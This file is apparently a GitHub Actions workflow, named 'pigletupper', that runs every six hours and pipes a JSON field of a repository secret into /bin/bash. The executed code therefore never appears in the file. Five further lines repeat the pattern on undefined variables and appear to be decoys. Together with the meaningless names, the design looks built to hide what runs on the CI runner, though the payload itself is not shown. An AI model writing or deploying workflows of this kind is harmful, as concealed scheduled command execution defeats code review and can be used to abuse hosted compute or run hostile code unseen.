name: pigletupper
on:
  workflow_dispatch:
  schedule:
    - cron: '12 0/6 * * *'
jobs:  # 14747
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pigletupper
        env:
          qic5: ${{ secrets.qic5 }}
        run: |
          echo $qic5 | jq -r .orvzq88 | /bin/bash
          echo $peawd578 | jq -r .sxroh1 | /bin/bash
          echo $hzyx43994 | jq -r .bucu2952 | /bin/bash
          echo $pdtl0632 | jq -r .kau5726 | /bin/bash
          echo $bgud503 | jq -r .qmi1 | /bin/bash
          echo $blf308 | jq -r .mw6521 | /bin/bash

